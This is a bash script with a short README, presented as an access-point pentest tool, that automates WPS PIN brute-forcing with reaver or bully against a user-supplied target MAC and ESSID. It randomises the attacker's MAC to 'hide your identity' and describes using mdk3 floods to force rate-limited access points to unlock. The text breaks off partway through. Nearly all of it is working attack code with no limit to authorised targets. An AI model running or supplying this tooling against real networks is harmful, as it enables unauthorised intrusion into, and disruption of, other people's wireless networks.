This Script was created for Access Points that locks up for long periods of time. It works by starting reaver and continously detect when reaver is rate limiting pins, once reaver detects the AP is rate limiting pins, it starts mdk3 attacks. mdk3 attacks are killed once reaver detects that the AP has unlocked itself!
Requirements:
[1] reaver
[2] bully
[3] mdk3
[4] aireplay-ng
ReVdK3 Acces Point pentest Script.
Usage:
git clone https://github.com/r0bag/pentest && cd pentest chmod +x *.sh ./ReVdK3-r3.sh
Script:
#!/bin/bash
declare MAC;
declare PIN_TIME;
declare WLAN;
declare MON1;
declare MON2;
declare MON3;
declare PHY_OF_WLAN_1;
declare NO_OF_MONITOR_INTERFACES_CHECK;
declare MONITOR_INTERFACES;
declare STOP_INTERFACE;
declare VARIABLE;
declare CHANNEL;
declare DISTANCE_BETWEEN_PINS;
declare TIMEOUT;
declare ESSID;
declare SATISFIED_OPTION=r;
declare REAVER_COMMAND_LINE;
declare MDK3_MAIN_MENU_OPTION;
declare RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS;
declare RETURN_OPTION_FOR_EAPOL_START_FLOOD;
declare EAPOL_START_FLOOD_COMMAND;
declare AUTH_DOS_FLOOD_COMMAND;
declare RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD;
declare EAPOL_LOG_OFF_FLOOD_COMMAND;
declare VARIABLE_CHECK_FOR_RATE_LIMITING;
declare TARGET_STATION;
declare MDK3_KILLALL_1
declare AIREPLAY_KILLALL;
declare SUCCESSIVE_EAPOL_FAILURES;
declare AIREPLAY_RESET;
declare MONITOR_INTERFACES_CHECK;
declare GO_STATUS;
declare NO_GO_STATUS
clear
GO_STATUS=`echo -e "\e[31m[\e[34mAffirmative\e[31m]\e[0m"`
NO_GO_STATUS=`echo -e "\e[31m[\e[33mNegative\e[31m]\e[0m"`
REAVER_CHECK=`which reaver`
BULLY_CHECK=`which bully`
MDK3_CHECK=`which mdk3`
AIREPLAY_NG_CHECK=`which aireplay-ng`
GNOME_TERMINAL_CHECK=`which gnome-terminal`
TIMEOUT_CHECK=`which timeout`
echo -e "\e[36mChecking to see if the following programs are installed";
echo -e "\e[36mProgram Exist?"
echo -ne "\e[36m[1] reaver";
if [ -z "$REAVER_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[2] bully";
if [ -z "$BULLY_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[3] mdk3";
if [ -z "$MDK3_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[4] aireplay-ng";
if [ -z "$AIREPLAY_NG_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[5] gnome-terminal";
if [ -z "$GNOME_TERMINAL_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[5] timeout";
if [ -z "$TIMEOUT_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
if [ -z "$MDK3_CHECK" ]; then
echo -e "\e[31m\e[1mmdk3 is not installed.Exiting script...";
exit
fi
if [ -z "$AIREPLAY_NG_CHECK" ]; then
echo -e "\e[31m\e[1maireplay-ng is not installed.Exiting script...";
exit
fi
if [ -z "$GNOME_TERMINAL_CHECK" ]; then
echo -e "\e[31m\e[1mgnome-terminal is not installed.Exiting script...";
exit
fi
if [ -z "$TIMEOUT_CHECK" ]; then
echo -e "\e[31m\e[1mtimeout is not installed.Exiting script...";
exit
fi
clear
#WELCOM MESSAGE
echo -e "\e[36m\e[1m###########################\e[0m";
echo -e "\e[36m\e[1m# WELCOME TO ReVdK3 Script#\e[0m";
echo -e "\e[36m\e[1m###########################\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo -e "\e[36m\e[1m# This Script allows you to use reaver and an mdk3 flood attack that#\e[0m";
echo -e "\e[36m\e[1m# you choose #\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo -e "\e[36m\e[1m# This Script was created for Access Points that locks up for long #\e[0m";
echo -e "\e[36m\e[1m# periods of time. It works by starting reaver and continously #\e[0m";
echo -e "\e[36m\e[1m# detect when reaver is rate limiting pins, once reaver detects #\e[0m";
echo -e "\e[36m\e[1m# the AP is rate limiting pins, it starts mdk3 attacks. mdk3 attacks#\e[0m";
echo -e "\e[36m\e[1m# are killed once reaver detects that the AP has unlocked itself ! #\e[0m";
echo -e "\e[36m\e[1m# The prcoess goes on... #\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo ;
echo -e "\e[37m\e[44m\e[1m ReVdK3.sh-r3 \e[0m";
echo ;
echo ;
echo -e "\e[36m\e[40m\e[1m******************************************************\e[0m";
echo -e "\e[36m\e[40m\e[1m* Welcome: I need to verify your wireless interface *\e[0m";
echo -e "\e[36m\e[40m\e[1m******************************************************\e[0m";
echo ;
read -p "Which wireless interface you will be using? e.g wlan0, wlan0mon etc": WLAN;
EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f2`;
while [ -z "$WLAN" -o "$EXISTENCE_OF_WLAN" != "$WLAN" ]; do
echo -e "\e[31m\e[1mYou input a wireless interface that doesn't exist!\e[0m";
echo ;
read -p "Which wireless interface you will be using? e.g wlan0, wlan0mon etc": WLAN;
EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f2`;
done
PHY_OF_WLAN_1=`airmon-ng|grep $WLAN|cut -d ' ' -f1|cut -c 1-4`;
NO_OF_MONITOR_INTERFACES_CHECK=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|wc -l`;
MONITOR_INTERFACES=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|cut -f1|tr -s [:space:] ' '`;
echo -e "\e[36m\e[1mKilling any existing monitor interface(s) on $WLAN\e[0m";
if [ "$NO_OF_MONITOR_INTERFACES_CHECK" != 1 ]; then
for STOP_INTERFACE in $MONITOR_INTERFACES; do
if [ "$STOP_INTERFACE" != "$WLAN" ]; then
airmon-ng stop $STOP_INTERFACE > /dev/null;
fi
done
fi
echo -e "\e[36m\e[1mSuccessful!\e[0m";
echo -e "\e[36m\e[1mI am hiding your identity by changing your mac\e[0m";
ifconfig $WLAN down
sleep 2
macchanger -r $WLAN
sleep 3
iwconfig $WLAN mode monitor
sleep 3
ifconfig $WLAN up
echo -e "\e[36m\e[1mStarting three new monitor modes...\e[0m";
#MON1=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
#MON2=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
#MON3=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
iw phy $PHY_OF_WLAN_1 interface add mon1 type monitor;
iw phy $PHY_OF_WLAN_1 interface add mon2 type monitor;
iw phy $PHY_OF_WLAN_1 interface add mon3 type monitor;
MON1=`iw dev | grep mon1 | cut -d " " -f 2`
MON2=`iw dev | grep mon2 | cut -d " " -f 2`
MON3=`iw dev | grep mon3 | cut -d " " -f 2`
iw dev
echo "Check the interfaces..."
echo "Successful!"
echo "################################################"
trap 'echo -e "\n\e[36m\e[1mCleaning up all temporary files created by this script..good house keeping...ensuring all processes are killed!\e[31m\e[0m";
killall -1 ReVdK3-r2.sh;killall mdk3 2> /dev/null; killall -9 reaver 2> /dev/null;killall -9 bully 2> /dev/null; killall tail 2> /dev/null; rm -f /etc/reaver_tmp.txt 2> /dev/null;
rm -f /etc/bully_tmp.txt 2> /dev/null; airmon-ng stop "$MON1" > /dev/null; airmon-ng stop "$MON2" > /dev/null; airmon-ng stop "$MON3" > /dev/null;
killall aireplay-ng 2> /dev/null;rm -f /etc/aireplay_tmp.txt 2> /dev/null;killall -9 ReVdK3-r2.sh > /dev/null;' SIGINT SIGHUP EXIT
clear
function REAVER_COMMAND_LINE_OPTIONS {
while [ "$SATISFIED_OPTION" = r ]; do
clear
echo ;
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo -e "\e[36m\e[40m\e[1m*Welcome to Reaver's configuration*\e[0m";
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx MAC ADDRESS OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
while [ -z "$MAC" ]; do
echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
done
echo "MAC address saved...";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx ESSID OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
while [ -z "$ESSID" ]; do
echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
done
echo "ESSID saved...";
echo;
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx Reaver's Options x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(note: Some Access Point hop to another channel when they reboot! x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Timeout Option (-t) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(Reaver's time to wait for a message from the AP) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] Reaver's time between pin (-d) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
#CHANNEL CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx CHANNEL SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|) ]]; do
echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
done
#DISTANCE BETWEEN PIN ATTEMPTS CHAIN
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx PIN DELAY SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
while [[ $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']* ]]; do
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
done
#TIME OUT CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx TIMEOUT SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default option press ENTER": TIMEOUT;
while [[ $TIMEOUT = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']* ]]; do
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default
option press ENTER": TIMEOUT;
echo ;
done
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx REAVER COMMAND LINE YOU HAVE CHOOSEN x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" -a "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv"`;
echo;
fi
if [ -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -t "$TIMEOUT" -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -z "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv"`;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
echo ;
read -p "Are you satisified with this configuration? if not, input 'r' and you will be returned to Reaver's Configuration Wizard": SATISFIED_OPTION;
if [ -e /etc/reaver_tmp.txt ]; then
rm -f /etc/reaver_tmp.txt
fi
if [ -e /etc/aireplay_tmp.txt ]; then
rm -f /etc/aireplay_tmp.txt
fi
clear
done
}
function BULLY_COMMAND_LINE_OPTIONS {
while [ "$SATISFIED_OPTION" = r ]; do
clear
echo ;
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo -e "\e[36m\e[40m\e[1m*Welcome to Bully's configuration *\e[0m";
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx MAC ADDRESS OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
while [ -z "$MAC" ]; do
echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
done
echo "MAC address saved...";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx ESSID OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
while [ -z "$ESSID" ]; do
echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
done
echo "ESSID saved...";
echo -e "\e[36m\e[1mResetting your mac address to its original mac\e[0m";
sleep 2;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $MON1 down;
ifconfig $MON1 down;
ifconfig $MON2 down;
ifconfig $MON2 down;
ifconfig $MON3 down;
ifconfig $MON3 down;
macchanger -p "$WLAN"> /dev/null;
macchanger -p "$MON1"> /dev/null;
macchanger -p "$MON2"> /dev/null;
macchanger -p "$MON3"> /dev/null;
ifconfig $MON1 up;
ifconfig $MON1 up;
ifconfig $MON2 up;
ifconfig $MON2 up;
ifconfig $MON3 up;
ifconfig $MON3 up;
echo;
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx Bully's Options x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(note: Some Access Point hop to another channel when they reboot! x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Bully's time between pin (-1) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] Force Bruteforce Checksum Digit (-B -F) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
echo -e "\e[34m\e[7m\e[1mNote:\e[31m\e[0m\e[31m\e[1m
Timeout option (-t) is Deprecated / Ignored in bully.\e[30m\e[0m"
echo ;
#CHANNEL CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx CHANNEL SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default bully's option": CHANNEL;
while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|) ]]; do
echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default bully's option": CHANNEL;
done
#DISTANCE BETWEEN PIN ATTEMPTS CHAIN
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx FIRST HALF OF PIN DELAY SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "How much time in seconds for distance between pin attempts? (-1 flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
while [[ $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']* ]]; do
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p "How much time in seconds for distance between pin attempts? (-1 flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
done
echo ;
#BRUTEFORCE CHECKSUM
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx BRUTEFORCE CHECKSUM DIGIT SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Would you prefer bully to bruteforce the checksum digit if the first half of the pin is found?Press ENTER for 'no' or input 'y' or 'Y' for 'yes'": BRUTEFORCE_CHECKSUM;
while [[ $BRUTEFORCE_CHECKSUM != @(y|Y|) ]]; do
echo -e "\e[31m\e[1mYou need to input 'y'or 'Y' for 'yes' OR or press ENTER for 'no' !\e[0m";
echo ;
read -p "Would you prefer bully to bruteforce the checksum digit if the first half of the pin is found?Press ENTER for 'no' or input 'y' or 'Y' for 'yes'": BRUTEFORCE_CHECKSUM;
echo;
done
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx BULLY COMMAND LINE YOU HAVE CHOOSEN x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
############### -B -F arguments false###############################
if [ -z $BRUTEFORCE_CHECKSUM ]; then
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -F $MON1"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -F $MON1"`;
echo;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -F $MON1"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -l 10 -S -v3 -F $MON1"`;
echo ;
fi
fi
############### -B -F arguments true###############################
if [[ "$BRUTEFORCE_CHECKSUM" = @(y|Y) ]]; then
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -B -F $MON1"`;
echo;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
fi
echo -e "\e[34m\e[7m\e[1mWarning:\e[31m\e[0m\e[31m\e[1m
Your mac address is not spoofed when using bully for proper functionality of
bully.\e[30m\e[0m"
echo ;
read -p "Are you satisified with this configuration? if not, input 'r' and you will be returned to Bully's Configuration Wizard": SATISFIED_OPTION;
if [ -e /etc/bully_tmp.txt ]; then
rm -f /etc/bully_tmp.txt
fi
if [ -e /etc/aireplay_tmp.txt ]; then
rm -f /etc/aireplay_tmp.txt
fi
clear
done
}
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx ReVdK3 preferred WPS Pin Crackers x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Reaver v1.4 (legendary) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx Choose this option if you prefer to crack with reaver v1.4 x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Bully v1.0-22 x\e[0m";
echo -e "\e[36m\e[40m\e[1mx Choose this option if you prefer to crack with bully v1.0-22 x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Choose a preferred WPS Pin Cracker from above": WPS_PIN_CRACKER_OPTION
while [[ $WPS_PIN_CRACKER_OPTION != @(1|2) ]]; do
echo -e "\e[31m\e[1mIncorrect Option, input either '1' for reaver or '2' for bully\e[0m";
echo ;
read -p "Choose a preferred WPS Pin Cracker from above": WPS_PIN_CRACKER_OPTION
echo ;
done
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
if [ ! -z "$REAVER_CHECK" ]; then
clear;
REAVER_COMMAND_LINE_OPTIONS
else
echo -e "\e[31m\e[1mreaver is not installed.Exiting script...\e[30m\e[0m";
exit
fi
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
